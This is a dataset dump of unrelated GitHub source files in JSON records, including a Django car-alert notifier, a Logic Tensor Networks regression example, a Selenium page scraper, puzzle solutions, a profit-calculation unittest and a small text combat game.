min_price=min_price, max_price=max_price)\n specs.save()\n messages.success(request, \"Your filter is submitted and you'll be notified soon\")\n\n return redirect('/accounts/dashboard')\n\n@login_required(login_url = 'login')\ndef foundCar(request,id):\n\n \"got the Specification row from id\"\n specs = get_object_or_404(Specification,pk=id)\n\n cars = Car.objects.order_by('-created_date').filter(sold=False)\n \n filters={}\n if specs.brand:\n filters['Brand']=specs.brand.capitalize()\n cars = cars.filter(brand__icontains=specs.brand)\n if specs.model:\n filters['Model']=specs.model.capitalize()\n cars = cars.filter(car_title__icontains=specs.model)\n if specs.body_style:\n filters['Body']=specs.body_style.capitalize()\n cars = cars.filter(body_style__icontains=specs.body_style)\n if specs.fuel:\n filters['Fuel']=specs.fuel.capitalize()\n cars = cars.filter(fuel_type__icontains=specs.fuel)\n if specs.transmission:\n filters['Transmission']=specs.transmission.capitalize()\n cars = cars.filter(transmission__icontains=specs.transmission)\n if specs.color:\n filters['Color']=specs.color.capitalize()\n cars = cars.filter(color__icontains=specs.color)\n\n filters['Year']=str(specs.year)+' onwards'\n filters['Mileage']=str(specs.milage)+' +'\n filters['Min Price']=specs.min_price\n filters['Max Price']=specs.max_price\n\n \"filtering cars that match the specification\"\n\n data={\n 'name': specs.name,\n 'filter': filters,\n 'cars': cars,\n }\n return render(request, 'notify/filtered_cars.html',data)\n\n\ndef deleteFilter(request, id):\n specification = Specification.objects.get(id = id)\n specification.delete()\n messages.success(request,'You have deleted your Car Filter')\n return 
redirect('dashboard')\n\n@receiver(post_save, sender=Car)\ndef notifyUser(sender, instance, created, *args, **kwargs):\n def execute_in_thread():\n # received one tuple from the Car model...\n specs = Specification.objects.filter(year__lte=instance.year, milage__lte=instance.milage, min_price__lte=instance.price, max_price__gte=instance.price)\n\n for s in specs:\n if s.brand:\n if s.brand.lower()!=instance.brand.lower():\n continue\n if s.model:\n if s.model.lower() not in instance.car_title.lower():\n continue\n if s.body_style:\n if s.body_style!=instance.body_style:\n continue\n if s.fuel:\n if s.fuel!=instance.fuel_type:\n continue\n if s.transmission:\n if s.transmission!=instance.transmission:\n continue\n if s.color:\n if s.color!=instance.color:\n continue\n \n print('\\n\\nCar Matched to a filter with ID',s.id,'\\n\\n')\n\n user = s.name\n subject = 'Found you your Car'\n data = {\n 'user': user,\n 'car': instance.car_title,\n 'id': s.id,\n }\n message = render_to_string('emailTemplate.html',data)\n\n email = EmailMessage(subject, message, to=[s.email])\n email.content_subtype = 'html'\n email.send()\n\n thread = threading.Thread(target=execute_in_thread)\n thread.start()\n\n \n\n ","repo_name":"codesentry17/thisIsEverything","sub_path":"notify/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"43934709986","text":"import logging; logging.basicConfig(level=logging.INFO)\nimport tensorflow as tf\nimport pandas as pd\nimport ltn\nimport argparse\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--csv-path',type=str,default=None)\n parser.add_argument('--epochs',type=int,default=500)\n parser.add_argument('--batch-size',type=int,default=64)\n args = parser.parse_args()\n dict_args = vars(args)\n return dict_args\n\nargs = parse_args()\nbatch_size = args['batch_size']\nEPOCHS = args['epochs']\ncsv_path = args['csv_path']\n\n\n# # Data\n# \n# Load the real estate dataset\ndf = pd.read_csv(\"real-estate.csv\")\ndf = df.sample(frac=1) #shuffle\n\nx = df[['X1 transaction date', 'X2 house age',\n 'X3 distance to the nearest MRT station',\n 'X4 number of convenience stores', 'X5 latitude', 'X6 longitude']]\ny = df[['Y house price of unit area']]\nds_train = tf.data.Dataset.from_tensor_slices((x[:330],y[:330])).batch(batch_size)\nds_test = tf.data.Dataset.from_tensor_slices((x[330:],y[330:])).batch(batch_size)\n\n\n# # LTN\n#\n# Regressor (trainable)\nf = ltn.Function.MLP(input_shapes=[6],output_shape=[1],hidden_layer_sizes=(8,8))\n# Equality Predicate\neq = ltn.Predicate.Lambda(\n #lambda args: tf.exp(-0.05*tf.sqrt(tf.reduce_sum(tf.square(args[0]-args[1]),axis=1))) \n lambda args: 1/(1+0.5*tf.sqrt(tf.reduce_sum(tf.square(args[0]-args[1]),axis=1)))\n)\n\n# Operators and axioms\nNot = ltn.Wrapper_Connective(ltn.fuzzy_ops.Not_Std())\nAnd = ltn.Wrapper_Connective(ltn.fuzzy_ops.And_Prod())\nOr = ltn.Wrapper_Connective(ltn.fuzzy_ops.Or_ProbSum())\nImplies = ltn.Wrapper_Connective(ltn.fuzzy_ops.Implies_Reichenbach())\nForall = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMeanError(p=2),semantics=\"forall\")\nExists = ltn.Wrapper_Quantifier(ltn.fuzzy_ops.Aggreg_pMean(p=2),semantics=\"exists\")\n@tf.function\ndef axioms(x_data, y_data):\n x = ltn.Variable(\"x\", x_data)\n y = ltn.Variable(\"y\", y_data)\n return Forall(ltn.diag(x,y), eq([f(x),y]))\n\n# Initialize all layers and the static graph\nfor x, y in ds_test:\n print(\"Initial sat level %.5f\"%axioms(x,y))\n break\n\n# # Training\n# \n# Define the metrics. While training, we measure:\n# 1. The level of satisfiability of the Knowledge Base of the training data.\n# 1. The level of satisfiability of the Knowledge Base of the test data.\n# 3. The training accuracy.\n# 4. 
The test accuracy.\nmetrics_dict = {\n 'train_sat': tf.keras.metrics.Mean(name='train_sat'),\n 'test_sat': tf.keras.metrics.Mean(name='test_sat'),\n 'train_accuracy': tf.keras.metrics.RootMeanSquaredError(name=\"train_accuracy\"),\n 'test_accuracy': tf.keras.metrics.RootMeanSquaredError(name=\"test_accuracy\")\n}\n\n\n# Define the training and test step\noptimizer = tf.keras.optimizers.Adam(learning_rate=0.0005)\n@tf.function\ndef train_step(x, y):\n # sat and update\n with tf.GradientTape() as tape:\n sat = axioms(x, y)\n loss = 1.-sat\n gradients = tape.gradient(loss, f.trainable_variables)\n optimizer.apply_gradients(zip(gradients, f.trainable_variables))\n sat = axioms(x, y)\n metrics_dict['train_sat'](sat)\n # accuracy\n metrics_dict['train_accuracy'](y,f.model(x))\n \n@tf.function\ndef test_step(x, y):\n # sat\n sat = axioms(x, y)\n metrics_dict['test_sat'](sat)\n # accuracy\n metrics_dict['test_accuracy'](y,f.model(x))\n\n# Train\n\nimport commons\n\ncommons.train(\n EPOCHS,\n metrics_dict,\n ds_train,\n ds_test,\n train_step,\n test_step,\n csv_path=csv_path,\n track_metrics=50\n)","repo_name":"logictensornetworks/logictensornetworks","sub_path":"examples/regression/regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":229,"dataset":"github-code","pt":"91"}
+{"seq_id":"32548149803","text":"import os\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom pyvirtualdisplay import Display\nimport time\nimport pkg_resources\nimport logging\n\n\nclass Chrome():\n def __init__(self, driver_path):\n # self.display = Display(visible=0, size=(1024, 768))\n # self.display.start()\n\n options = Options()\n # prefs = {\"profile.managed_default_content_sttings.images\": 2}\n # options.add_experimental_option(\"prefs\", prefs)\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-setuid-sandbox\")\n options.add_argument('--disable-gpu')\n # options.add_argument('blink-settings=imagesEnabled=false')\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\n self.driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)\n\n def exit(self):\n # self.display.stop()\n self.driver.quit()\n\n def __del__(self):\n # self.display.stop()\n self.driver.quit()\n\n def scroll2bottom(self):\n self.driver.execute_script(\"window.scrollBy(0, document.documentElement.scrollHeight);\")\n\n @property\n def scroll_height(self):\n return self.driver.execute_script(\"return document.body.scrollHeight\")\n\n def load_list_page(self, url):\n self.driver.get(url)\n while True:\n last_height = self.scroll_height\n self.scroll2bottom()\n time.sleep(10)\n new_height = self.scroll_height\n if last_height == new_height:\n more_button = self.driver.find_element_by_xpath(\"//button[@id='show-more-button']\")\n if more_button.is_displayed():\n more_button.click()\n else:\n break\n last_height = new_height\n html = self.driver.page_source\n if os.environ.get('USERNAME') == 'yetongxue':\n path = '/home/yetongxue/Downloads/tmp/{}.html'.format(url.split('/')[-1])\n with open(path, 'w') as f:\n f.write(html)\n return html\n","repo_name":"astonezml/cnki_patent","sub_path":"utils/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"91"}
+{"seq_id":"13446231072","text":"Import(\"env\", \"app_env\", \"rom_env\", \"c_runtime\", \"app_startup\", \"rom_startup\")\n\nquasipixel = env.Object(Split('$ROOT/lib/quasipixel.c $ROOT/lib/qp_render.asm'))\n\nhello = env.Object(\"hello.c\")\n\napp_env.Program(\"hello\", hello + c_runtime + app_startup, LIBS=['c', 'sys'])\nrom_env.Program(\"hello\", hello + c_runtime + rom_startup, LIBS=['c', 'sys'])\n\nsnake = env.Object(Split('snake.c snake_maps.c'))\n\nrom_env.Program('snake_rom', snake + c_runtime + rom_startup + quasipixel, LIBS=['c', 'sys'])\nsnake_app = app_env.Program('snake', snake + c_runtime + app_startup + quasipixel, LIBS=['c', 'sys'])\n\nshell_app = app_env.Program('shell', Split('shell.c lib/more.c') + c_runtime + app_startup, LIBS=['c', 'sys'])\n\nethtest_app = app_env.Program('ethtest', Split('ethtest.c') + c_runtime + app_startup, LIBS=['c', 'sys'])\n\nReturn(\"snake_app shell_app ethtest_app\")\n","repo_name":"imihajlow/ccpu-apps","sub_path":"SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"49597986","text":"def get_input(filename):\n data = []\n with open(filename, 'r') as i:\n for x in i.readlines():\n data.append(int(x))\n return data\n\n\ndef count_increases(measurements):\n previous = measurements[0]\n increases = 0\n for measurement in measurements[1:]:\n if measurement > previous:\n increases += 1\n previous = measurement\n return increases\n\n\ndef sliding_window_increases(measurements, window_size):\n previous = sum(measurements[0:window_size])\n increases = 0\n for x in range(1, len(measurements)):\n current = sum(measurements[x:x+window_size])\n if current > previous:\n increases += 1\n previous = current\n return increases\n\n\ndef main():\n measurements = get_input(\"input\")\n print(\"Part 1:\")\n print(count_increases(measurements))\n print()\n print(\"Part 2:\")\n print(sliding_window_increases(measurements, 3))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"thetwoj/advent-of-code-2021","sub_path":"day01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"72046602222","text":"import sqlite3\nimport config\nimport os\nimport cgi\nimport leaderboard_db\n\ndef add_leaderboard(titleLeaderboardInput, descriptionInput, genreInput, authorInput):\n conn = sqlite3.connect(config.db_filename)\n \n c = conn.cursor()\n\n titleLeaderboard = titleLeaderboardInput\n description = descriptionInput\n genre = genreInput\n author = authorInput\n\n users = leaderboard_db.get_users()\n\n for user in users:\n if user.Username == author:\n c.execute(\"INSERT INTO Leaderboards(Name, User_Id, Description, Genre) VALUES( ?, ?, ?, ?)\", (str(titleLeaderboard),str(user.User_Id),str(description),str(genre)))\n else:\n c.execute(\"INSERT INTO Leaderboards(Name, User_Id, Description, Genre) VALUES(?, ?, ?, ?)\", (str(titleLeaderboard),str((len(users) + 1)),str(description),str(genre)))\n \n #c.execute(\"INSERT INTO Users(Username, Description, Password) VALUES('Kitty Jacobs','Student at Immaculata Institute', 'aaa')\")\n\n conn.commit()\n c.close()","repo_name":"KittyJac/GIPWebApp","sub_path":"edit_db.py","file_name":"edit_db.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"9577040069","text":"import itertools\nimport logging\nfrom operator import add, mul, sub, truediv\n\nfrom euler.util.decorators import timed_function\n\n\ndef find_combinations(numbers):\n operators = [add, sub, mul, truediv]\n chosen = []\n results = {0}\n\n def helper():\n if len(chosen) == 3:\n first = chosen[0](permutation[0], permutation[1])\n second = chosen[1](first, permutation[2])\n result = chosen[2](second, permutation[3])\n\n # logging.debug(f'{result, permutation, chosen}')\n\n if result % 1 == 0:\n results.add(abs(int(result)))\n\n return\n\n for operator in operators:\n chosen.append(operator)\n helper()\n chosen.pop()\n\n for permutation in map(list, itertools.permutations(numbers)):\n helper()\n\n # logging.debug(f'{numbers, list(sorted(results))}')\n for should_be, element in enumerate(sorted(results)):\n if element != should_be:\n return should_be - 1\n\n return -1\n\n\ndef q93():\n max_permutation, max_ways = [], 0\n for permutation in map(list, itertools.combinations(range(3, 20), 2)):\n permutation = [1, 2] + permutation\n ways = find_combinations(permutation)\n if ways >= max_ways:\n logging.debug(f'{ways, permutation}')\n max_ways = ways\n max_permutation = permutation\n\n return ''.join(map(str, max_permutation))\n\n\nif __name__ == '__main__':\n import sys\n\n logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)\n assert (timed_function(q93)() == '1258')\n","repo_name":"mgls23/Euler","sub_path":"individual_solutions/p93.py","file_name":"p93.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"30606179628","text":"#输入\nstr1=input()\nstr2=input()\nstr11=str1.split()\nstr22=str2.split()\nn=str11[0]\nm=str11[1]\nbiaoji=\"\"\npaixu=[]\nzuhe=[]\n#计算排列数列\nfor j in str22:\n biaoji=j\n for k in str22:\n if k!=biaoji:\n paixu.append(biaoji+\" \"+k)\n#计算组合数列\nfor jj in range(0,len(str22)):\n biaoji = str22[jj]\n for k in range(jj,len(str22)):\n if str22[k] != biaoji:\n zuhe.append(biaoji + \" \" + str22[k])\n#输出\nprint(\"Permutation:\")\nfor h in paixu:\n print(h)\nprint(\"Combination:\")\nfor h in zuhe:\n print(h)\n\n","repo_name":"wangli-wangli/python","sub_path":"zuoye/homework/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39953125234","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 15 01:44:36 2017\n\n@author: Junwoo Suh\n\nMain script to run the signal process\nChange inputs to fit your data\n\nSignal preprocess package work flow:\n 1. Process annotation and header files\n 2. Process the record to contain the channels of interest\n 3. Filter the record using notch filter and low pass fileter\n 4. Remove artifact by ICA\n\nFeature extraction package work flow:\n 1. Run Time frequency analysis\n 2. \n\"\"\"\n\nfrom preprocess import io as in_out\nfrom preprocess import process_data\nfrom scipy.fftpack import fft, ifft\nfrom scipy import signal as SIG\nimport pandas as pd\nimport numpy as np\nimport time as clock\nimport scipy.io as spio\nimport os\nimport glob\n\n#Measure time \nt, elapsed = [], []\nt.append(clock.time())\n\"\"\"\n#Use GUI to pick data\nsignal = in_out.open_data()\n\n\"\"\"\n# Just for a debugging purpose\nsignal = process_data.raw_signal('/Users/dohoonkim/Desktop/Research/insomnia/Data/ins1.edf',\n '/Users/dohoonkim/Desktop/Research/insomnia/Data/ins1.txt',\n '/Users/dohoonkim/Desktop/Research/insomnia/Data/header_file.txt')\n\n\n#%% Signal Preprocessing parameters\nsignal.process_annot_n_header()\neeg_ch = ['Fp2-F4','F4-C4','C4-P4','P4-O2','C4-A1']\nemg_ch, ecg_ch, eog_ch = 'EMG1-EMG2','ECG1-ECG2',['ROC-LOC','LOC-ROC']\namerican = False\nh_freq = 60 # Just a testing value. Can try different number under Nyquist Frequency\nbuffer_time = '01:00:00' #Wake time before sleep onset at the beginin and end of the sleep\n\nvisualize = False\nr_thres = 0.8\n\n\n#%% Run signal preprocess\nsignal.process_record(eeg_ch, emg_ch, ecg_ch, eog_ch,american,h_freq,buffer_time)\nsignal.artifact_removal_ICA(visualize,r_thres)\n\n#Measure preprocess time\nelapsed.append(clock.time() - t[-1])\nt.append(clock.time())\n#%% Feature extraction parameters\nNewSig = signal.corrected_data\n#maximum = len(NewSig[0,:])\n#\n#firstSig = NewSig[0,:]\n#secondSig = NewSig[1,:]\n#thirdSig = NewSig[2,:]\n#fourthSig = NewSig[3,:]\n#fifthSig = NewSig[4,:]\n#\n#firstList = [firstSig[x:x+7680] for x in range(0, maximum, 7680)]\n#secondList = [secondSig[x:x+7680] for x in range(0, maximum, 7680)]\n#thirdList = [thirdSig[x:x+7680] for x in range(0, maximum, 7680)]\n#fourthList = [fourthSig[x:x+7680] for x in range(0, maximum, 7680)]\n#fifthList = [fifthSig[x:x+7680] for x in range(0, maximum, 7680)]\n\n#read dataset from matlab file csv\ndelta_path = \"/delta\"\nallFiles = glob.glob(os.path.join(delta_path,\"*.csv\"))\nnp_array_list = []\nfor file_ in allFiles:\n df = pd.read_csv(file_,index_col=None, header=0)\n np_array_list.append(df.as_matrix())\n\ncomb_np_array = np.vstack(np_array_list)\nbig_frame = pd.DataFrame(comb_np_array)\n\nbig_frame.columns = [\"min\",\"max\",\"avg\"]\n\n#for i in range(1,6):\n# for j in range()\n\n\ncol_names = ['delta','theta','alpha','sigma','beta'];\nnewDF = pd.DataFrame(columns = col_names); #creates a new dataframe\nData = NewSig;\n\n\n\n\n#def buffer(x, n, p, opt=None):\n# '''Mimic MATLAB routine to generate buffer array\n#\n# MATLAB docs here: https://se.mathworks.com/help/signal/ref/buffer.html\n#\n# Args\n# ----\n# x: signal array\n# n: number of data segments\n# p: number of values to overlap\n# opt: initial condition options. 
default sets the first `p` values\n# to zero, while 'nodelay' begins filling the buffer immediately.\n# '''\n# import numpy\n#\n# if p >= n:\n# raise ValueError('p ({}) must be less than n ({}).'.format(p,n))\n#\n# # Calculate number of columns of buffer array\n# cols = int(numpy.ceil(len(x) // int(n-p)))\n#\n# # Check for opt parameters\n# if opt == 'nodelay':\n# # Need extra column to handle additional values left\n# cols += 1\n# elif opt != None:\n# raise SystemError('Only `None` (default initial condition) and '\n# '`nodelay` (skip initial condition) have been '\n# 'implemented')\n#\n# # Create empty buffer array\n# b = numpy.zeros((n, cols))\n# # Fill buffer by column handling for initial condition and overlap\n# j = 0\n# for i in range(int(cols)):\n# # Set first column to n values from x, move to next iteration\n# if i == 0 and opt == 'nodelay':\n# b[0:n,i] = x[0:n]\n# continue\n# # set first values of row to last p values\n# elif i != 0 and p != 0:\n# b[:p, i] = b[-p:, i-1]\n# # If initial condition, set p elements in buffer array to zero\n# else:\n# b[:p, i] = 0\n#\n# # Get stop index positions for x\n# k = j + n - p\n#\n# # Get stop index position for b, matching number sliced from x\n# n_end = p+len(x[j:k])\n#\n# # Assign values to buffer array from x\n# b[p:n_end,i] = x[j:k]\n#\n# # Update start index location for next iteration of x\n# j = k\n#\n# return b\n#\n#NewSig = signal.corrected_data\n#\"\"\"NFFT = [512,256,128]\"\"\"\n#NFFT = 512\n#Output512 = np.zeros((5,7027200))\n#\"\"\"\n#have to modify to incorporate cases for different window sizes\n#Output256 = np.array(5,7027200)\n#Output128 = np.array(5,7027200)\n#\"\"\"\n#\"\"\"for i = 0:2\"\"\"\n#\n#x = np.zeros((5,7027200))\n#X = np.zeros((7027200,1))\n#mean512 = np.zeros((5,NFFT))\n#for j in range(0,5):\n# win = SIG.hamming(NFFT) \n# x[j,:] = NewSig[j,:]\n# pval = int(NFFT//2)\n# bx = buffer(x[j,:],NFFT,pval)\n# bx = bx[:,1:len(bx[0])-1]\n# a = np.diag(win)\n# bx = np.dot((np.transpose(bx)),a)\n# meanFFT = abs(fft(bx,NFFT) / sum(win))\n# mean = meanFFT.mean(0)\n# mean512[j,:] = np.transpose(mean)\n\n\n\n#%% Run feature extraction\n#%%\nimport pandas as pd\nfrom sklearn.decomposition import PCA \n \n#feat_cols = eeg_ch\n#mean512 = np.transpose(mean512) \n#d = {'Fp2-F4': mean512[:,0], 'F4-C4': mean512[:,1], 'C4-P4': mean512[:,2], 'P4-O2': mean512[:,3],'C4-A1': mean512[:,4]}\n#df = pd.DataFrame(data = d, dtype = float)\n#pca = PCA(n_components=3)\n#pca_result = pca.fit_transform(df.values)\n#df['pca-one'] = pca_result[:,0]\n#df['pca-two'] = pca_result[:,1] \n#df['pca-three'] = pca_result[:,2]\n#\n#df1 = df[df.columns[5:8]]\n#\n#print (pca.explained_variance_ratio_)\n#rndperm = np.random.permutation(df.shape[0])\n# \n#\"\"\"\n# df['label'] = eeg_ch\n# df['label'] = df['label'].apply(lambda i: str(i))\n#\n# mean512, eeg_ch = None, None\n# \n# pca = PCA(n_components=3)\n# pca_result = pca.fit_transform(df[feat_cols].values)\n#\n# df['pca-one'] = pca_result[:,0]\n# df['pca-two'] = pca_result[:,1] \n# df['pca-three'] = pca_result[:,2]\n# \n# print (pca.explained_variance_ratio_)\n# \n# rndperm = np.random.permutation(df.shape[0])\n# \n#\"\"\"\n#\"\"\"bx = np.dot((np.transpose(bx)),win)\n#length = len(bx[0])\n#bx = np.transpose(bx).dot(np.diag(win))\n#meanFFT = abs(fft(bx,NFFT) / sum(win))\n#meanFFT = np.mean(meanFFT,2)\n#Output512[j,:] = 
meanFFT\"\"\"\n\n\n\n","repo_name":"andykim123/Machine-Learning-Approach-to-Classifying-Insomnia-with-EEG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16121675488","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.conf.urls import url, include\n\nfrom updater import views\n\nurlpatterns = [\n url(r'^bridge/', include('bridge.urls')),\n url(\n r'^bank/update/(?P\\d+)$',\n views.BankUpdateFileDetailView.as_view(),\n name='bank-update-file'\n ),\n url(\n r'^$',\n views.BankUpdateFileListView.as_view(),\n name='bank-update-file-index'\n ),\n\n url(\n r'^bank/update/(?P\\d+)/procesar$',\n views.BankUpdateFileProcess.as_view(),\n name='bank-update-file-process'\n ),\n\n url(\n r'^bank/list$',\n views.BancoListView.as_view(),\n name='banco-update-list'\n ),\n\n url(\n r'^bank/(?P\\d+)$',\n views.BancoDetailView.as_view(),\n name='banco-update-detail'\n ),\n\n url(\n r'^bank/bill$',\n views.BancoBillingView.as_view(),\n name='banco-bill'\n ),\n\n url(\n r'^bank/client$',\n views.BancoClientView.as_view(),\n name='banco-client'\n ),\n\n url(\n r'^cotizacion/files$',\n views.CotizacionUpdateFileList.as_view(),\n name='cotizacion-file-index'\n ),\n\n url(\n r'^cotizacion/update/(?P\\d+)/procesar$',\n views.CotizacionUpdateFileProcessView.as_view(),\n name='cotizacion-update-file-process'\n ),\n\n url(\n r'^cotizacion/update/(?P\\d+)/compare$',\n views.CotizacionUpdateFileCompareView.as_view(),\n name='cotizacion-update-file-compare'\n ),\n\n url(\n r'^cotizacion/update/(?P\\d+)$',\n views.CotizacionUpdateFileDetailView.as_view(),\n name='cotizacion-update-file'\n ),\n\n url(\n r'^cotizacion/list$',\n views.CotizacionListView.as_view(),\n name='cotizacion-update-list'\n ),\n\n url(\n r'^cotizacion/(?P\\d+)$',\n views.CotizacionDetailView.as_view(),\n name='cotizacion-update-detail'\n ),\n\n url(\n r'^cotizacion/bill$',\n views.CotizacionBillingView.as_view(),\n name='cotizacion-bill'\n ),\n\n url(\n r'^cotizacion/(?P\\d+)/retrasadas/crear$',\n views.RetrasadasCrearView.as_view(),\n name='retrasadas-crear'\n ),\n\n url(\n r'^banco/comparaciones$',\n views.ComparacionBancoListView.as_view(),\n name='compracion-banco-list'\n ),\n\n url(\n r'^banco/comparacion/(?P\\d+)$',\n views.ComparacionBancoDetailView.as_view(),\n name='comparacion-banco-detail'\n ),\n\n url(\n r'^banco/comparacion/(?P\\d+)/procesar$',\n views.ComparacionBancoProcessView.as_view(),\n name='comparacion-banco-process'\n ),\n\n url(\n r'^complemento/(?P\\d+)/cobro$',\n views.BancoFaltanteCobroView.as_view(),\n name='banco-faltante-cobro'\n ),\n\n url(\n r'^complemento/(?P\\d+)/clientes$',\n views.BancoFaltanteClientView.as_view(),\n name='banco-faltante-cliente'\n ),\n\n url(\n r'^complemento/list$',\n views.BancoFaltanteListView.as_view(),\n name='bancofaltante-list'\n ),\n]\n","repo_name":"SpectralAngel/taupdater","sub_path":"updater/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"37973244969","text":"import unittest\nfrom Profit import data_manu as dm\n\n\nclass TestProfits(unittest.TestCase):\n\n def setUp(self):\n testprofit = [('bitcoin', '2021-03-19', '$58,243'), # use the lastest date to get today's price to compare to get profit\n ('bitcoin', '2021-03-10', '$56,020'),\n ('ethereum', '2021-03-19', '$1,817.13'), # use the lastest date to get today's price to compare to get profit ,\n ('ethereum', '2021-03-10', '$1,802.31')]\n\n testavgprofit_data = [('bitcoin', '2021-03-19', 0.0), # use data of weekly profit for 2 coins for testing of average profit\n ('bitcoin', '2021-03-18', 0.55), \n ('bitcoin', '2021-03-17', -1.33), \n ('bitcoin', '2021-03-16', 2.43),\n ('bitcoin', '2021-03-15', 4.19), \n ('bitcoin', '2021-03-14', -2.04), \n ('bitcoin', '2021-03-13', -5.27), \n ('bitcoin', '2021-03-12', 1.53),\n ('ethereum', '2021-03-19', 0.0), \n ('ethereum', '2021-03-18', 2.03), \n ('ethereum', '2021-03-17', -0.64),\n ('ethereum', '2021-03-16', 0.47),\n ('ethereum', '2021-03-15', 1.44), \n ('ethereum', '2021-03-14', -2.69), \n ('ethereum', '2021-03-13', -6.09), \n ('ethereum', '2021-03-12', 2.54)]\n\n self.test_profit = testprofit # list of data gotten from SQL \n self.testavg = testavgprofit_data\n\n def test_calprofit(self):\n profit_list = list((0.0,3.82,0.0,0.82)) # as profit is 0 as its using today price as both argument\n price_list = list(('58243','56020','1817.13','1802.31')) # removed $ symbol to be inserted into price list\n date_list =list(('2021-03-19','2021-03-10','2021-03-19','2021-03-10')) # testing for range of dates to be appended into date list\n name_list =list(('bitcoin','bitcoin','ethereum','ethereum')) \n self.assertEqual(dm.cal_profit_dict(self,self.test_profit),(profit_list,price_list,date_list,name_list)) # returning 4 diff array of data to be inserted into SQL\n\n\n def test_avg_profit(self):\n avg_profit_list = list((0.01,-0.35)) #average profit of 2 coins\n coins_list = list(('bitcoin','ethereum')) #coins list\n self.assertEqual(dm.avg_dict(self,self.testavg),(avg_profit_list,coins_list)) # returning 2 arrays using data of individual daily profit of different coins\n\n\nif __name__ == '__main__':\n unittest.main() \n\n\n\n\n","repo_name":"weian31/OOPProject","sub_path":"Web_scraping/FirstLayer/SecondLayer/test_profit.py","file_name":"test_profit.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"33772395543","text":"TensionPoints = 0\nimport random\n\n#monster information\nmonster_name = \"Goblin\"\nmonster_health = 50\nplayer_health = 50\nmonster_damage = 2\nprint(f\"You are now fighting {monster_name}! It has {monster_health} health.\")\nprint(f\"You have {player_health} health.\")\n\nwhile monster_health > 0 and player_health > 0:\n #Print the possible moves the user can do\n print(\"You can select one of the following moves:\")\n print(\"slash (1-10 damage)\")\n print(\"stab (4-16 damage)\")\n print(\"\"\"defend (You take the half the damage you would normally take)\n(You also gain 10 Tension Points (TP).\"\"\")\n print(\"dodge (Both sides take no damage) (You also gain 5 TP.)\")\n print(\"fireball (requires 20 TP) (Deals 25-30 damage)\")\n print(\"heal prayer (requires 15 TP) (Heals 8 health)\")\n print(\"\")\n \n #Ask the user to select a move and store as variable\n move = input(\"Choose the move you like to use: \")\n \n #The damage the monster deals\n \n monster_damage = random.randint(4, 7)\n if monster_health < 20:\n print(f\"{monster_name} became enraged! It will now deal triple the damage.\")\n monster_damage = monster_damage * 3\n else:\n chance = random.randint(1, 2)\n if chance == 2:\n print(f\"{monster_name} is preparing something...\")\n \n #What happens for each move\n if move == \"slash\":\n damage = random.randint(1, 10)\n elif move == \"stab\":\n damage = random.randint(4, 6)\n elif move == \"defend\":\n damage = 0\n TensionPoints = TensionPoints + 10\n monster_damage=monster_damage/2\n elif move == \"dodge\":\n damage = 0\n monster_damage = 0\n TensionPoints = TensionPoints + 5\n chance2 = random.randint(1, 3)\n if chance2 == 2:\n print(\"You couldn't dodge in time!\")\n monster_damage = 2\n elif move == \"fireball\":\n if TensionPoints < 20:\n print (\"You do not have enough TP for that.\")\n else:\n damage = random.randint(25, 30)\n elif move == \"heal prayer\":\n if TensionPoints < 15:\n print (\"You do not have enough TP for that.\")\n else:\n player_health = player_health + 8\n print (\"You gained 8 health.\")\n else:\n print (\"That's not a valid move!\\n\")\n continue\n \n #Calculate damage dealt to the monster and subtract from health, also the damage the monster deals to you\n monster_health = monster_health-damage\n if monster_health <= 0:\n break\n player_health = player_health-monster_damage\n if monster_health < 0:\n monster_health = 0\n if player_health < 0:\n player_health = 0\n print(f\"You've dealt {damage} damage! The monster now has {monster_health} health left.\\n\")\n print(f\"The monster dealt {monster_damage} damage! You have {player_health} health left.\")\n\n#if you lose or win\nif player_health == 0:\n print(\"You lost. Better luck next time...\")\nif monster_health == 0:\n print(f\"You defeated {monster_name}!\")\n","repo_name":"Slimenati/PyClass","sub_path":"Python class 10-24-21/combat.py","file_name":"combat.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
